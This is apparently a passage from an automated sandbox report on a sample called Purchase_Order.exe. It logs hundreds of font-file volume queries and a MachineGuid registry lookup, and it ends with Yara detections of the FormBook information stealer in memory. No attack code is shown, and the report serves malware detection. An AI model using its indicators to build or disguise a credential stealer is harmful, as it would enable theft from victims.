            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
